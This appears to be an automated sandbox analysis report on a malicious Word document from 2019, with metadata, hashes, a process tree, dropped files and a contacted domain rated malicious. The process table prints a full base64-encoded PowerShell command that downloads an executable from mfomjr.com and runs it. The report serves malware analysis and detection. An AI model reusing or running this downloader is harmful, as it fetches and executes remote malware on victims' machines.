File name: | info_23.05.doc |
Full analysis: | https://app.any.run/tasks/a7d17117-98c2-4cfb-98fd-4e58a34283cd |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 12:33:07 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: Uzbekistan Sum, Subject: national, Author: Colt Bruen, Comments: Frozen, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 23 05:11:00 2019, Last Saved Time/Date: Thu May 23 05:11:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 89, Security: 0 |
MD5: | 88DBEB1C0ECFC288A5ACA3885047F45E |
SHA1: | E7D4D1E920EA56161F7E245DEFDE8F084F6F73EB |
SHA256: | C1E1ED23A686334F018700246A61CC922496CE68FF4E0FED8D9A412E337ED88F |
SSDEEP: | 1536:Q6p6qy8GDBTb5VnUvWMyDoTITDH3eIKJKYD+viErrHo8GV7arq7s1T+a9yR:Q6p6qy8GDBTb5VUvVy6ITzpODzLZRPR |
.flo | | | iGrafx FlowCharter document (36.2) |
---|---|---|
.doc | | | Microsoft Word document (34.5) |
.doc | | | Microsoft Word document (old ver.) (20.5) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Dickens |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 103 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Konopelski - Cummings |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 89 |
Words: | 15 |
Pages: | 1 |
ModifyDate: | 2019:05:23 04:11:00 |
CreateDate: | 2019:05:23 04:11:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | Frozen |
Keywords: | - |
Author: | Colt Bruen |
Subject: | national |
Title: | Uzbekistan Sum |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3552 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\info_23.05.doc.flo | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3376 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_23.05.doc.flo" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3512 | powershell -nop -e JABMAEEAMABtAEkATgBzAD0AJwBwAFAATQB3AF8AMABiAEMAJwA7ACQAQgBtAGkAcQBaAGgAIAA9ACAAJwA3ADAAMAAnADsAJABxAGEAYQBIAHMAOQBHAHoAPQAnAHQAWgAxAHQAaQBDAGwAJwA7ACQAVABOADkAZAB1AHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEIAbQBpAHEAWgBoACsAJwAuAGUAeABlACcAOwAkAEkAagA1AGgAOABpAGsAUAA9ACcAQwBvAHMANgB2AGoAdwAnADsAJABBAEUAdwBfAEQAegA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGAAZQBiAGAAQwBMAEkAYABlAE4AVAA7ACQAcwBpAEEASQBZAFEAPQAnAGgAdAB0AHAAOgAvAC8AbQBmAG8AbQBqAHIALgBjAG8AbQAvAGwAZQBnAG8AdQAvADMAcgBlAHQAeQB4AG8AMgBtAC4AcABoAHAAPwBsAD0AcwBwAGkAawBkADYALgB3AGEAcAAnAC4AUwBQAGwAaQB0ACgAJwBAACcAKQA7ACQAdgBLAEgANgBTAFMANgAyAD0AJwBaADgAMQBtAHYAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAdwBhAEgAcwBDAGsAIABpAG4AIAAkAHMAaQBBAEkAWQBRACkAewB0AHIAeQB7ACQAQQBFAHcAXwBEAHoALgBEAE8AVwBuAGwATwBhAGQAZgBpAEwAZQAoACQAdwBhAEgAcwBDAGsALAAgACQAVABOADkAZAB1AHQAKQA7ACQAdQBpAG8ASQB0AEUASwB0AD0AJwBaAEYASgByAGQAdQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFQATgA5AGQAdQB0ACkALgBsAEUATgBHAHQASAAgAC0AZwBlACAAMwAwADMAMgA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAFQAKAAkAFQATgA5AGQAdQB0ACkAOwAkAGYAbQBPAEMAbwBOAD0AJwBqAE4AQgA5AGQAYgBvACcAOwBiAHIAZQBhAGsAOwAkAEwAdwBjAEMAdQBqAD0AJwBTAFIANwB3AGQARwBHADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUABwAGMAXwA2AGkAagBpAD0AJwBMAEIAbwBmAHoAVwBqAHUAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR698B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3512 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1BLI9FXL8A8XIEQ6UR5J.temp | — | |
MD5:— | SHA256:— | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFAB135047CAFAED07.TMP | — | |
MD5:— | SHA256:— | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{724A7071-CD0C-4CCC-9570-5104A8B83D59}.tmp | — | |
MD5:— | SHA256:— | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{805D23C7-FAE7-48EC-9A28-E86B2FC83B79}.tmp | — | |
MD5:— | SHA256:— | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:01323F148C83A32CF5452750422767CC | SHA256:B1B516E8510F694E6E20DC3D77472DB209A4A66544B86C1CF49373F8D14D5B65 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\846C6923.wmf | wmf | |
MD5:296715247637B5E0E4A13E77B3498960 | SHA256:3A97E1D74255C9908669B079A11F031C1A7998D456AEC1290E7A10F33502F0F5 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:28F8559CAF37AFB65EC1D85F6E9E7AE3 | SHA256:E9637B527B04FA20CD73057872B770065D751256F09FC9BEDCCCA97CA5CF4AF5 | |||
3512 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6F328E7.wmf | wmf | |
MD5:1D5B7ECF314806E22CFBA40108614D54 | SHA256:D803A25B2CC0B61A357E57D6B820229A5735D3C00D7D49D6435D86585626926E |
Domain | IP | Reputation |
---|---|---|
mfomjr.com |
| malicious |